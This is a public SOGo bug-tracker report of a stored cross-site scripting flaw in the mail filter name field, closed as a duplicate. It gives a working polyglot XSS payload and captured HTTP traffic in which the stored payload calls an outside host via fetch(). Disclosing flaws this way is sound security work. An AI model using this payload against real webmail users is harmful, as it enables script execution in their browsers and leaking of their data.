0006008: Stored-XSS in Mail Filters Field - SOGo | BTS

ID	Project	Category	View Status	Date Submitted	Last Update

0006008	SOGo	Web Preferences	public	2024-08-20 00:00	2024-09-12 06:58

Reporter	julian123	Assigned To	qhivert
Priority	normal	Severity	minor	Reproducibility	always
Status	closed	Resolution	duplicate
Platform	[Server] Linux	OS	Ubuntu	OS Version	16.04 LTS
Product Version	5.10.0

Summary	0006008: Stored-XSS in Mail Filters Field
Description	A cross-site scripting payload can be stored in as a Filter, leading to execution when the user navigates to their inbox.
Steps To Reproduce	Authenticate to the application. Navigate to Preferences > Mail > Filters Select `Create Filter` In the filter name add the following payload //</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(1)//>\x3e Select `Ok` Navigate to the user's inbox and observe the XSS payload execute.
Additional Information	POST /SOGo/so/sam@123.com/Preferences/save HTTP/1.1 Host: 192.168.2.96 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: application/json, text/plain, / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://192.168.2.96/ Content-Type: application/json;charset=utf-8 X-XSRF-TOKEN: a49754c88694526868cabce81257ee1e55990205 Content-Length: 5017 Origin: http://192.168.2.96 DNT: 1 Sec-GPC: 1 Connection: keep-alive ...snip... ],"SOGoMailDisplayRemoteInlineImages":"never","hasActiveExternalSieveScripts":false,"SOGoSieveFilters":[{"match":"all","active":1,"name":"//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=fetch('https://jkq.ca/tango-1191/10')//>\\\\x3e","rules":[{"field":"subject","operator":"contains","value":"123"} HTTP/1.1 200 OK contacts category fields Server: nginx Date: Sun, 18 Aug 2024 10:10:46 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 0 Connection: keep-alive Strict-Transport-Security: max-age=15768000; X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Robots-Tag: none X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin GET /SOGo/so/sam@123.com/Calendar/view HTTP/1.1 Host: 192.168.2.96 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://192.168.2.96/ DNT: 1 Sec-GPC: 1 Connection: keep-alive HTTP/1.1 200 OK Server: nginx Date: Sun, 18 Aug 2024 10:11:13 GMT Content-Type: text/html; charset=utf-8 Content-Length: 82887 Connection: keep-alive Strict-Transport-Security: max-age=15768000; X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-Robots-Tag: none X-Download-Options: noopen X-Frame-Options: SAMEORIGIN X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin ...snip... ,"SOGoSieveFilters":[{"actions":[{"argument":"Drafts","method":"fileinto"}],"name":"//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=fetch('https://jkq.ca/tango-1191/10')//>\\\\x3e","rules":[{"field":"subject","operator":"contains","value":"123"}
Tags	preferences

Date Modified	Username	Field	Change
2024-08-20 00:00	julian123	New Issue
2024-08-20 00:00	julian123	Tag Attached: preferences
2024-08-20 14:07	qhivert	Relationship added	related to 0006010
2024-08-20 14:08	qhivert	Relationship added	related to 0006004
2024-09-12 06:58	qhivert	Assigned To	=> qhivert
2024-09-12 06:58	qhivert	Status	new => closed
2024-09-12 06:58	qhivert	Resolution	open => duplicate